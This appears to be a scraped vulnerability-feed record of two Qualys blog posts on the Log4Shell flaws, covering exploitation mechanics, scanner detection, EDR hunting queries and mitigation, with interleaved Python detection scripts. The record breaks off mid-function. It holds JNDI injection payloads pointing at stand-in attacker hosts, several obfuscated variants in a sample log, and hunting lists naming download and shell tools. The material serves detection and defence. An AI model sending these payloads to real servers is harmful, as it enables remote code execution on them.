CVSS v3.1: 10.0 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H); CVSS v2: 9.3 HIGH (AV:N/AC:M/Au:N/C:C/I:C/A:C)
Source: https://blog.qualys.com/category/vulnerabilities-threat-research

Last seen 2022-01-04T10:37:30
Description
On December 09, 2021, a critical remote code execution vulnerability was identified in Apache Log4j2 after proof-of-concepts were leaked publicly, affecting Apache Log4j 2.x <= 2.15.0-rc1. The vulnerability is being tracked as CVE-2021-44228 with a CVSSv3 score of 10 and affects numerous applications which are using the Log4j2 library.

Successful exploitation of this vulnerability could allow a remote attacker to download and execute arbitrary code on the target system.
With the vulnerability being actively exploited in the wild, and considering the gravity of the situation, [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) has released **QID 150440** and **150441**, which send specially crafted requests to the target server to detect vulnerable web application instances using the Log4j2 library. Once successfully detected, users can remediate the vulnerability by upgrading to **Apache Log4j 2.17.1**.

On December 14, 2021, [CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>) was published to address the deficiencies in the fix for CVE-2021-44228. Later it was also identified that under non-default configurations Apache Log4j 2.15.0 could allow an attacker to exfiltrate data and achieve remote code execution (RCE). The Qualys WAS team is working on improvements to our detections.

On December 27, 2021, **[Log4j 2.17.1](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.17.1>)** was released to patch a new arbitrary code execution vulnerability discovered in version 2.17.0. The vulnerability is tracked as [CVE-2021-44832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) and affects versions 2.0-alpha7 to 2.17.0, excluding security fix releases 2.3.2 and 2.12.4.

### About CVE-2021-44228

Apache Log4j is an extremely popular Java library used by application developers to log data; this logging functionality helps with debugging issues and security incidents. The logged untrusted data could be errors such as exception traces, authentication failures, and other unpredicted vectors of user input. If the data contains a certain payload, the JNDI lookup method triggers and executes arbitrary code from attacker-controlled servers, leading to a remote code execution vulnerability.

#### Vulnerability analysis

In Log4j2 the [lookups](<https://logging.apache.org/log4j/log4j-2.3/manual/lookups.html>) functionality gives the user the ability to add values to the configuration at arbitrary places while keeping the format easy to maintain. There are multiple lookup methods such as Map Lookup, Environment Lookup, Context Map Lookup, etc.

The vulnerability was introduced in Log4j2 version 2.0-beta9 when the "JNDILookup plugin" was added to the [library](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.0-beta9>) as one of the lookup methods. As per the official [documentation](<https://logging.apache.org/log4j/log4j-2.3/manual/lookups.html#JndiLookup>):

**_"The JndiLookup allows variables to be retrieved via JNDI. By default, the key will be prefixed with java:comp/env/, however, if the key contains a ":" no prefix will be added."_**

JNDI, which stands for "Java Naming and Directory Interface", is a Java API which allows Java applications to perform lookups and retrieve Java objects using protocols such as LDAP, RMI, DNS, etc. This JNDI lookup allows a developer to retrieve DataSource objects and enhance the data which is being logged by the log4j library.

#### JNDI Injection

On vulnerable instances of Log4j2, any data that is being logged can trigger the application to reach out to attacker-controlled servers.

As the attack vectors are not limited to specific injection points, attackers can test the vulnerability by injecting malicious JNDI lookup payloads inside HTTP request headers or via POST request form fields such as username, email, password, etc.

Vulnerable instances will parse such a payload and reach out to the malicious LDAP server attacker.com via the JNDI lookup method to execute the `rce_class`.

It is safe to say that the vulnerability is present due to an improper input validation weakness. On any new log entry, if log4j encounters a JNDI lookup string starting with `${jndi:protocol://`, it will try to parse it and thereafter perform the lookup action to resolve the required variable, eventually fetching and executing the malicious `rce_class`.

### Remote Code Execution POC:

The Qualys WAS team was able to exploit the vulnerability successfully on a vulnerable instance of Log4j; below is the POC to demonstrate how attackers are exploiting this vulnerability in the real world:

##### **Vulnerable application code :**

First, the attacker injects the JNDI payload into the vulnerable application; once the input is logged by log4j, it will parse the text and try to resolve it.

##### Stage one : LDAP referrer

The above payload supplied by the attacker uses the LDAP protocol.
The log4j library on encountering this string will make a LDAP query to the target LDAP server running on `127.0.0.1:1389`\n\nNext, the attacker uses [marshalsec](<https://github.com/mbechler/marshalsec>) package to setup a LDAP referrer that accepts incoming JNDI lookup request and creates a redirection to an HTTP server hosting the malicious class (Exploit.class) as show below:\n\n\n\n##### Stage two: Hosting malicious class\n\nHere, an HTTP server is hosting a malicious Java class which will execute a command to open a calculator application on the target server.\n\n\n\nFinally, the malicious class is download and executed leading to remote code execution.\n\n\n\n### Detecting the Vulnerability with Qualys WAS\n\nCustomers can detect Apache Log4j Remote Code Execution vulnerability (CVE-2021-44228) with Qualys Web Application Scanning using **QID 150440**, **150441**:\n\nQID 150440 - Apache Log4j Remote Code Execution (RCE) Vulnerability (Log4Shell CVE-2021-44228)\n\nThe WAS module injects JNDI payload into the headers listed below, application specific vulnerable endpoints and uses Out Of Band (OOB) detection mechanism where vulnerable instances will make a callback DNS query that will trigger Qualys Periscope detection mechanism :\n\n 1. X-Api-Version\n 2. User-Agent\n 3. Referer\n 4. X-Druid-Comment\n 5. Origin\n 6. Location\n 7. X-Forwarded-For\n 8. Cookie\n 9. X-Requested-With\n 10. X-Forwarded-Host\n 11. Accept\n 12. Authentication\n 13. Authorization\n\nVulnerable Applications detection covered under QID 150440:\n\n 1. Apache Struts2\n 2. Apache Solr\n 3. Apache Druid\n 4. Apache OFBiz\n 5. Apache JSPWiki\n\nQualys WAS OOB service uses unique DNS payload on every request which makes the detection mechanism accurate in identifying the vulnerability.\n\n### WAS Log4Shell Detection Methodology with Qualys Periscope\n\n\n\nWhen WAS tests a web application for the Log4Shell vulnerability, the following steps are performed:\n\n 1. 
WAS makes multiple requests with specially crafted payloads in the request header fields listed above. For example, the 'User-Agent' here has been modified to include a payload pointing at Qualys Periscope:\n\n\n\n 2. If the scanned application is vulnerable to Log4Shell, it attempts to connect to the address in the modified request header. To do so it must first resolve the FQDN under the qualysperiscope.com domain shown in the payload.\n 3. As part of the DNS resolution process:\n    1. The request is received by the Qualys Periscope DNS service.\n    2. The DNS service verifies that the hash embedded in the request is valid. This ensures the lookup request is genuine and was generated by a WAS scan.\n    3. If the hash is verified, Periscope logs the request internally.\n    4. If verification fails, the request is dropped.\n 4. WAS then queries Periscope with the lookup request data along with the scan ID and hash for each of the injected request header payloads. Periscope verifies the hash from WAS and either:\n    1. Matches the WAS query against a logged lookup request from the web application: the site is vulnerable to Log4Shell.\n    2. Fails to match the WAS query against a logged lookup request: no vulnerability is reported. Note that this is a negative result, not proof of absence; a vulnerable application whose resolver cannot reach the Periscope zone produces the same outcome.\n 5. WAS processes the data received from Qualys Periscope, and reports any vulnerabilities corresponding to payloads which were successfully executed.\n\n### Scan Configurations :\n\nQID 150440 has been added to the WAS Core Detection Scope, so all scans using Core detection include this QID. However, to expedite testing for CVE-2021-44228 across all of your web applications, it is recommended that you create a new scanning Option Profile that limits testing to this specific vulnerability.
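The verification flow in the steps above, modelled end to end as an added example (this is not Qualys code; the `oob.example` zone, the `scan.slot.nonce.tag` label layout, the shared key and the stand-in application are assumptions made for illustration). Each header gets its own token carrying a keyed nonce, the DNS side logs a query only when the tag verifies, and the scanner reconciles by token, so a hit names the header that was logged while a forged or replayed callback is dropped:

```python
"""Model of the OOB DNS callback check: per-header keyed tokens, a DNS authority
that only logs verified queries, and a scanner that reconciles by token.
Added example, not Qualys code; zone name, label layout, key handling and the
stand-in application are assumptions for illustration."""
import hashlib
import hmac
import re
import secrets

OOB_ZONE = "oob.example"                    # assumed stand-in for the real callback zone
SHARED_KEY = b"scanner/dns shared secret"   # constructed; a real service keeps this server-side
JNDI_HOST_RE = re.compile(r"\$\{jndi:[a-z]+://([^/:}]+)", re.IGNORECASE)


def _tag(key, scan_id, slot, nonce):
    """Keyed tag over (scan, injection point, nonce); 16 hex chars keeps the label short."""
    msg = f"{scan_id}.{slot}.{nonce}".encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()[:16]


def make_token(scan_id, slot, key=SHARED_KEY):
    """Unique per (scan, injection point): lowercase (DNS is case-insensitive) plus a fresh nonce."""
    scan_id, slot, nonce = scan_id.lower(), slot.lower(), secrets.token_hex(4)
    return f"{scan_id}.{slot}.{nonce}.{_tag(key, scan_id, slot, nonce)}"


class OobDnsService:
    """Stand-in for the callback zone's DNS authority (step 3 above)."""

    def __init__(self, key=SHARED_KEY):
        self.key = key
        self.seen = {}      # verified token -> source IP of the first query
        self.dropped = 0    # queries whose tag did not verify

    def on_query(self, qname, src_ip):
        qname = qname.rstrip(".").lower()
        suffix = "." + OOB_ZONE
        parts = qname[:-len(suffix)].split(".") if qname.endswith(suffix) else []
        if len(parts) != 4:
            self.dropped += 1
            return False
        scan_id, slot, nonce, tag = parts
        if not hmac.compare_digest(tag, _tag(self.key, scan_id, slot, nonce)):
            self.dropped += 1          # forged or mangled: not generated by a scan
            return False
        self.seen.setdefault(".".join(parts), src_ip)
        return True


class Scanner:
    """Stand-in for the WAS side (steps 1, 4 and 5 above)."""

    def __init__(self, scan_id, dns):
        self.scan_id, self.dns, self.sent = scan_id, dns, {}

    def build_request(self, header_names):
        """One distinct token per header, so a callback names the header that was logged."""
        headers = {}
        for name in header_names:
            token = make_token(self.scan_id, name)
            self.sent[name] = token
            headers[name] = f"${{jndi:ldap://{token}.{OOB_ZONE}/a}}"
        return headers

    def reconcile(self):
        """Header -> IP that resolved its token, or None if no verified callback arrived.
        None is 'no callback observed', not proof of safety: blocked DNS egress looks the same."""
        return {name: self.dns.seen.get(token) for name, token in self.sent.items()}


def vulnerable_app(headers, logged_headers, dns, app_ip):
    """Stand-in for an app whose log4j-core 2.14 logs some headers: every logged
    ${jndi:...} value makes it resolve the embedded host first (step 2 above)."""
    for name in logged_headers:
        m = JNDI_HOST_RE.search(headers.get(name, ""))
        if m:
            dns.on_query(m.group(1), app_ip)


def demo():
    """Scan a stand-in app that logs only User-Agent; also send one forged callback."""
    dns = OobDnsService()
    scan = Scanner("scan42", dns)
    request = scan.build_request(["User-Agent", "X-Api-Version", "Referer"])
    vulnerable_app(request, ["User-Agent"], dns, app_ip="198.51.100.7")
    dns.on_query(f"scan42.referer.deadbeef.0123456789abcdef.{OOB_ZONE}", "203.0.113.9")
    return scan.reconcile(), dns.dropped
```

`demo()` scans a stand-in application that logs only the User-Agent header and then sends one forged query: the reconciliation maps User-Agent to the application's address, the other two headers to None, and the forged callback is counted as dropped. Treat None as "no callback observed" rather than "not vulnerable"; an application whose resolver cannot reach the callback zone produces exactly the same result.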
Create a new Option Profile and, under Detection Scope, select \u201cCustom Search Lists\u201d to create a new static list.\n\n\n\nComplete the creation wizard and add QID 150440 to the Static Search List.\n\n\n\nOptionally you can add Information Gathered (IG) QIDs for confirmation of links crawled, scan diagnostics, etc. IG QIDs will not significantly impact the efficiency of the scan.\n \n \n IG QIDs: 6, 38116, 38291, 38597, 38600, 38609, 38704, 38706, 38717, 38718, 42350, 45017, 45038, 45218, 86002, 90195, 150005, 150006, 150007, 150008, 150009, 150010, 150014, 150015, 150016, 150017, 150018, 150019, 150020, 150021, 150024, 150025, 150026, 150028, 150029, 150030, 150032, 150033, 150034, 150035, 150036, 150037, 150038, 150039, 150040, 150041, 150042, 150043, 150044, 150045, 150054, 150058, 150061, 150065, 150066, 150067, 150077, 150078, 150080, 150082, 150083, 150086, 150087, 150089, 150094, 150095, 150097, 150099, 150100, 150101, 150104, 150105, 150106, 150111, 150115, 150116, 150125, 150126, 150135, 150140, 150141, 150142, 150143, 150148, 150152, 150157, 150164, 150167, 150168, 150169, 150170, 150172, 150176, 150177, 150182, 150183, 150184, 150185, 150186, 150194, 150195, 150197, 150202, 150203, 150204, 150205, 150206, 150208, 150210, 150244, 150245, 150247, 150257, 150261, 150262, 150265, 150277, 150291, 150292, 150308, 150325, 150344, 150345, 150348, 150350, 150351, 150352\n\nWe recommend limiting the scan scope to at most 50 to 100 links.\n\n\n\nAdditionally, configure the scan to be launched at "Maximum" Performance for faster scan completion.\n\n\n\nScanning with the above configuration expedites testing of your web applications in two ways. First, only one specific vulnerability, QID 150440, is tested.
Second, as this vulnerability is only tested at the base URI and several directories up and down as appropriate, there is no need to crawl and test every link in the application. These two changes allow each web application to be scanned faster than a full Core detection scan while still providing the necessary visibility of any vulnerable versions of Log4j2.\n\n#### Report : 150440\n\nOnce the vulnerability is detected, results for QID 150440 in the vulnerability scan report look similar to the following:\n\n\n\nAs the report shows, the payload is injected into the **User-Agent** request header and the application makes a DNS lookup request to the Qualys Periscope detection mechanism.\n\nQualys WAS has also released QID 150441 - Forms Vulnerable to Apache Log4j Remote Code Execution (RCE) Vulnerability (Log4Shell CVE-2021-44228), which injects JNDI payloads into every user input form field (e.g. username, email, password). This gives broader coverage than open source scanning scripts written in Python and Go, whose injection points are more limited.\n\nAfter the JNDI payloads are injected into every form field, the vulnerable application makes a DNS lookup request to the Qualys Periscope mechanism:\n\nQID 150441 - Forms Vulnerable to Apache Log4j Remote Code Execution (RCE) Vulnerability (Log4Shell CVE-2021-44228)\n\n#### Report : 150441\n\nOn successful detection, the vulnerability scan report looks similar to the following:\n\n\n\nIn the above report, the crafted payload was sent in an HTTP POST request to the `uname` parameter of the application login form, which then triggered a DNS lookup request to the Qualys Periscope detection mechanism.\n\n### About CVE-2021-45046\n\nApache Log4j 2.15.0 was released to address CVE-2021-44228, but the fix turned out to be incomplete in certain non-default configurations.
Log4j 2.15.0 restricted JNDI LDAP lookups to localhost by default, so a lookup that points at a remote host, such as `${jndi:ldap://attacker.com/a}`, is blocked. CVE-2021-45046 tracks the configurations in which that restriction is not sufficient.\n\nAccording to the [Apache Security advisory](<https://logging.apache.org/log4j/2.x/security.html>), when the logging configuration uses a non-default pattern layout with a [Context Lookup](<https://logging.apache.org/log4j/2.x/manual/lookups.html#ContextMapLookup>) value, e.g. `$${ctx:loginId}`, attackers with control over [Thread Context Map](<https://logging.apache.org/log4j/2.x/manual/thread-context.html>) (Mapped Diagnostic Context or MDC) input data can craft a JNDI lookup pattern that is evaluated when the layout is rendered, which allows data exfiltration and, in certain environments, remote code execution.\n\n### About CVE-2021-44832\n\nThis arbitrary code execution vulnerability affects Log4j2 versions up to and including 2.17.0 (excluding the security releases 2.3.2 and 2.12.4). An attacker with permission to modify the logging configuration can construct a malicious configuration using a JDBC Appender whose data source references a JNDI URI, which can execute remote code. The issue is fixed by limiting JNDI data source names to the `java` protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.\n\nThe Qualys WAS research team is constantly working to find more attack vectors and will update the signatures accordingly. We are also working on detecting the vulnerability in applications that use the Log4j logging utility and will add new QIDs as needed.\n\n### Solution\n\nIt is strongly recommended to upgrade to the latest **Apache Log4j 2.17.1** to remediate these vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-44832).
According to the [Apache Security Advisory](<https://logging.apache.org/log4j/2.x/security.html>), version 2.17.1 also contains the fix (first shipped in 2.17.0) for the DoS vulnerability CVE-2021-45105, which affected 2.16.0 and earlier.\n\nRelease details Apache Log4j 2.17.1 : https://logging.apache.org/log4j/2.x/changes-report.html#a2.17.1\n\nIn cases where upgrading is not possible, we recommend applying the following mitigation guidelines:\n\n * **For Log4j 1.x** : Log4j 1.x has no lookup feature and is not affected by CVE-2021-44228. Applications using it are exposed only when the configuration includes a JMSAppender with a JNDI reference; this is tracked as CVE-2021-4104 and is mitigated by auditing the logging configuration to ensure no JMSAppender is configured.\n * **For Log4j 2.x** : Implement one of the mitigation techniques below :\n * Upgrade to Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7), or 2.17.1 (for Java 8 and later).\n * In prior releases, confirm that if the JDBC Appender is being used, it is not configured to use any protocol other than `java`.\n * Remove the JndiLookup class from the classpath: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`. This removes the Log4Shell entry point but does not address CVE-2021-45105 or the JDBC Appender issue (CVE-2021-44832), so treat it as a stop-gap until the upgrade.\n\nFor the latest updates on solution and mitigation guidelines, please refer to the [Apache Log4j security advisory](<https://logging.apache.org/log4j/2.x/security.html>)\n\n### Credits\n\n**Apache Security Advisory**: <https://logging.apache.org/log4j/2.x/security.html>\n\n**CVE Details**:\n\n * <https://nvd.nist.gov/vuln/detail/CVE-2021-44228>\n * <https://nvd.nist.gov/vuln/detail/CVE-2021-45046>\n * <https://nvd.nist.gov/vuln/detail/CVE-2021-44832>\n\n**Credits for the vulnerability discovery go to:**\n\n * Chen Zhaojun of Alibaba Cloud Security Team (CVE-2021-44228).\n * Kai Mindermann of iC Consult and, separately, 4ra1n (CVE-2021-45046).\n\n### References:\n\n * <https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce>\n * <https://y4y.space/2021/12/10/log4j-analysis-more-jndi-injection/>\n * <https://www.lunasec.io/docs/blog/log4j-zero-day/>\n * 
<https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java>\n\n### Contributors\n\n * **Sheela Sarva**, Director, Quality Engineering, Web Application Security, Qualys\n * **John Delaroderie**, Director, Product Management, Web App Security, Qualys\n\nPlease contact [John Delaroderie](<mailto:jdelaroderie@qualys.com>) if you need further information.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T17:06:36", "type": "qualysblog", "title": "Is Your Web Application Exploitable By Log4Shell Vulnerability?", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-15T17:06:36", "id": "QUALYSBLOG:42335884011D582222F08AEF81D70B94", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-21T20:37:15", "description": "In recent days, the cybersecurity industry has been rapidly assessing the full impact of the Log4Shell (CVE-2021-44228 and CVE-2021-45046) 
vulnerability. Many organizations are quickly trying to figure out whether this vulnerability is within their environment, and where. The next question a security operations team will ask is whether its presence has been exploited. This is critical to answer quickly given Log4Shell's high severity, the pervasiveness of Java, and its ease of exploitation.\n\nIn a previous blog we discussed [how to mitigate](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell>) the threat of this vulnerability via a patch or configuration change. Now let's take a deep dive into how this exploit unfolds, and how you can quickly assess if Log4Shell has been exploited in your environment.\n\n### How the Exploit Works\n\nLike many other remote code execution vulnerabilities, Log4Shell exists because untrusted input is interpreted instead of being treated as data. When using the log4j2 functionality, the text being logged can use what are known as [lookups](<https://logging.apache.org/log4j/2.x/manual/lookups.html>). For example, if you wanted to log the version of Java or the operating system running the application, you could denote that within the logged string as `${java:version}` or `${java:os}`, respectively. Since the logged text is not validated, whoever controls the text of the log message can trigger these lookups.\n\nThis specific exploit leverages the JNDI lookup. JNDI, the Java Naming and Directory Interface, provides an interface to LDAP, CORBA, RMI, and DNS services. When used as directed, this gives developers a convenient way to look up information from those services.
However, since the vulnerable versions of Log4J2 resolve JNDI lookups embedded in logged text, an attacker anywhere in the world can make the application load and run a class of their choosing.\n\nArmed with this information, attackers are scanning the internet for vulnerable hosts that are directly reachable. A simple non-malicious test is to force the vulnerable machine to make a DNS lookup. Without running suspicious commands or injecting malicious code onto a machine, this is a quick way to validate that the vulnerability exists.\n\nTo do this, attackers have been seen placing the malicious JNDI lookup string anywhere they suspect a field could be logged. This could be anything, from forms on websites intended for user interaction to fields normally filled in by machines (e.g. the user agent of the web browser). There have even been instances of vulnerable machines being detected through a crafted Wi-Fi SSID that is read and logged by other machines locally. With the prevalence of Java running on 15 billion devices worldwide, the attack surface of the Log4Shell vulnerability is enormous.\n\nLet's review 6 key detection opportunities to help you locate the Log4Shell vulnerability within your environment.\n\n#### Detection Opportunity 1: Scan Logs for Malicious Strings\n\nSince the attack travels through the logging pipeline, you may already be collecting those logs into a centralized location such as a log manager, SIEM, or XDR solution. First, look for strings known to be used in this exploit, such as \u201cJNDI\u201d. This will not be an exhaustive search, as the payloads can be heavily obfuscated, for example by assembling the word JNDI from `${::-j}${::-n}${::-d}${::-i}` or `${lower:j}${lower:n}${lower:d}${lower:i}`, which log4j itself resolves to `jndi` before the lookup runs.
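The de-obfuscation step in practice, as an added example that is not Qualys code: the normaliser applies the same case-mapping (`${lower:}`/`${upper:}`) and default-value (`${x:-y}`) substitutions that log4j itself performs, innermost first, and only then searches for `${jndi:`. The access-log lines it runs over are constructed for the example (TEST-NET addresses), not captured traffic:

```python
"""Scan log lines for Log4Shell probes after undoing the lookup-based
obfuscations attackers use to hide 'jndi'.  Added example, not Qualys code;
the access-log lines are constructed (TEST-NET addresses), not captured traffic."""
import re

# ${lower:x} / ${upper:x}: case-mapping lookups used to assemble 'jndi' piecewise
CASE_RE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${::-x}, ${env:NOPE:-x}, ${sys:NOPE:-x}: the ':-' default-value syntax yields 'x'
# when the lookup is empty.  Deliberately not applied to jndi itself: in
# ${jndi:ldap://h/a:-z} the JNDI lookup runs first and 'z' is only a fallback.
DEFAULT_RE = re.compile(r"\$\{(?!jndi:)[^${}]*?:-([^${}]*)\}", re.IGNORECASE)
# What we are looking for once the layers are peeled back
JNDI_RE = re.compile(r"\$\{\s*jndi:([a-z0-9+.-]+)://([^/}\s]+)[^}]*\}", re.IGNORECASE)


def normalize(text, max_rounds=25):
    """Resolve case and default-value lookups innermost-first until nothing changes.
    Log4j substitutes recursively in the same way, which is why nesting hides the keyword."""
    for _ in range(max_rounds):
        step = CASE_RE.sub(lambda m: m.group(2).lower() if m.group(1).lower() == "lower"
                           else m.group(2).upper(), text)
        step = DEFAULT_RE.sub(lambda m: m.group(1), step)
        if step == text:
            break
        text = step
    return text


def scan_lines(lines):
    """One finding per JNDI lookup found, with the de-obfuscated form and its target."""
    findings = []
    for n, raw in enumerate(lines, 1):
        decoded = normalize(raw)
        for m in JNDI_RE.finditer(decoded):
            findings.append({
                "line": n,
                "scheme": m.group(1).lower(),
                "target": m.group(2),
                "decoded": m.group(0),
                "obfuscated": raw.count("${") > decoded.count("${"),
            })
    return findings


# Constructed access-log sample: two benign lines (one even mentions 'jndi' in a
# path), then plain, case-mapped, default-value, env-lookup and mixed payloads.
SAMPLE_LOG = [
    '203.0.113.50 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.51 - - [10/Dec/2021:14:02:12 +0000] "GET /docs/jndi-tutorial HTTP/1.1" 200 2048 "-" "curl/7.79.1"',
    '203.0.113.52 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '203.0.113.53 - - [10/Dec/2021:14:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://203.0.113.10:1389/b}"',
    '203.0.113.54 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://203.0.113.10:1099/obj}"',
    '203.0.113.55 - - [10/Dec/2021:14:02:16 +0000] "POST /login HTTP/1.1" 302 0 "-" "${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://203.0.113.10/c}"',
    '203.0.113.56 - - [10/Dec/2021:14:02:17 +0000] "GET / HTTP/1.1" 200 512 "-" "${java:version} ${jndi:${lower:D}ns://203.0.113.10/probe}"',
]

if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LOG):
        tag = "obfuscated" if f["obfuscated"] else "plain"
        print(f'line {f["line"]}: {tag:10} {f["scheme"]}://{f["target"]}  <- {f["decoded"]}')
```

Running it reports five hits (lines 3 to 7 of the sample) with scheme and target, flagging all but the plain one as obfuscated; the two benign lines, including the one whose URL path merely contains `jndi`, produce nothing. The default-value rule is deliberately not applied to the `jndi` prefix itself: in `${jndi:ldap://h/a:-z}` log4j runs the lookup first and uses `z` only as a fallback, so collapsing it would hide the probe.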
The combinations of obfuscation can be nearly endless, so it's important to rely on detection in depth and to look for post exploitation events as well.\n\nAnother important aspect to remember is that the raw payload string is mostly visible for _failed_ attempts. When the lookup succeeds, log4j substitutes the resolved value into the message before the line is written, so the literal `${jndi:...}` text need not appear in the log at all; a failed lookup leaves it intact. A successful exploit can therefore be invisible to a search for the payload string even though a log line was written.\n\n#### Detection Opportunity 2: Look for Java Making Network Connections\n\nThe core of this exploit is that Log4J2 leverages the lookup functionality to make a network connection to a remote service (LDAP, RMI, etc.). While a Java process making network connections is not anomalous in itself, a Java process that starts talking to these services for the first time this week is highly suspect.\n\nThe following QQL queries in Qualys EDR can isolate hosts which have these types of connections:\n\n * process.name:"java" and network.remote.address.port:53 and type:NETWORK and action:ESTABLISHED\n * process.name:"java" and network.remote.address.port:389 and type:NETWORK and action:ESTABLISHED\n * process.name:"java" and network.remote.address.port:1389 and type:NETWORK and action:ESTABLISHED\n * process.name:"java" and network.remote.address.port:636 and type:NETWORK and action:ESTABLISHED\n * process.name:"java" and network.remote.address.port:1098 and type:NETWORK and action:ESTABLISHED\n * process.name:"java" and type:NETWORK and action:ESTABLISHED\n\nThe first five queries hunt for Java processes making connections to remote DNS, LDAP, LDAPS, or RMI services. The final query is more generic and will find all instances of Java making a network connection.
This will be useful to broaden the search to validate network connections for potential exploits still unknown at the time of this writing.\n\n\n\n#### Detection Opportunity 3: Look for Java Calling Suspicious Processes\n\nOnce an attacker validates that a system is exploitable, they will try to execute code on the victim's machine. This could come in the form of downloading malicious files or executing trusted binaries in malicious ways using Living off the Land Binaries and Scripts (LOLBAS) techniques. Commonly this shows up as scripting interpreters or data transfer utilities spawned by the Java process.\n\nThe following QQL queries can find evidence of such activity:\n\n * process.parentname: "java" and process.name: "cmd.exe"\n * process.parentname: "java" and process.name: "powershell.exe"\n * process.parentname: "java" and process.name: "pwsh.exe"\n * process.parentname: "java" and process.name: "wscript.exe"\n * process.parentname: "java" and process.name: "cscript.exe"\n * process.parentname: "java" and process.name: "python.exe"\n * process.parentname: "java" and process.name: "perl.exe"\n * process.parentname: "java" and process.name: "ruby.exe"\n * process.parentname: "java" and process.name: "curl.exe"\n * process.parentname: "java" and process.name: "wget.exe"\n\n\nRunning these \u201cas is\u201d will likely return results from benign and known applications. Use those results to build a known-good baseline and then narrow down suspicious invocations. The list above covers Windows binaries; on Linux hosts apply the same parent/child pattern to `sh`, `bash`, `curl`, `wget`, `python` and similar children of `java`.\n\n#### Detection Opportunity 4: Hunt for Java Processes Using Log4J2\n\nSimply looking for applications that are known to load Log4J2 is useful in understanding your attack surface. This provides insight into which machines may be actively vulnerable to exploitation.
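A complementary host-side check that does not depend on what appears on a process command line, written as an added example (not Qualys code) and serving both this detection opportunity and the JndiLookup.class removal mitigation listed in the Solution section of the previous post: walk the filesystem, open every JAR/WAR/EAR including JARs nested inside them, read log4j-core's `pom.properties` for the version, and classify the result against the Apache advisory cut-offs (2.15.0, 2.16.0, 2.17.0, 2.17.1 and the 2.12.x and 2.3.x back-ports). It also reports whether `JndiLookup.class` has been stripped, which is how that mitigation can be verified after the fact. The sample tree it builds is made of constructed stub archives, not real artefacts:

```python
"""Inventory log4j-core JARs on disk and classify each against the Apache advisory
(2.15.0 / 2.16.0 / 2.17.0 / 2.17.1 plus the 2.12.x and 2.3.x back-ports), noting whether
JndiLookup.class has been stripped.  Added example, not Qualys code; sample JARs are stubs."""
import io
import os
import re
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?$")
FIXED_ALL = {(2, 3): (2, 3, 2), (2, 12): (2, 12, 4)}   # other branches: 2.17.1
JNDI_GONE = {(2, 3): (2, 3, 1), (2, 12): (2, 12, 2)}   # other branches: 2.16.0

def parse_version(text):
    """'2.14.1' -> (2, 14, 1, 99, 0); '2.0-beta9' -> (2, 0, 0, 0, 9), so pre-releases sort first."""
    m = VERSION_RE.match(text.strip())
    if not m:
        return None
    major, minor, patch, pre, num = m.groups()
    return (int(major), int(minor), int(patch or 0), {"beta": 0, "rc": 1}.get(pre, 99), int(num or 0))

def classify(version, has_jndi_lookup):
    """Remediation status per the advisory, given whether JndiLookup.class is still in the JAR."""
    v = parse_version(version)
    if v is None:
        return "unknown-version: inspect manually"
    if v[0] != 2:
        return "log4j-1.x: not affected by CVE-2021-44228; audit for JMSAppender (CVE-2021-4104)"
    if v >= FIXED_ALL.get(v[:2], (2, 17, 1)) + (99, 0):
        return "patched"
    if v >= JNDI_GONE.get(v[:2], (2, 16, 0)) + (99, 0):
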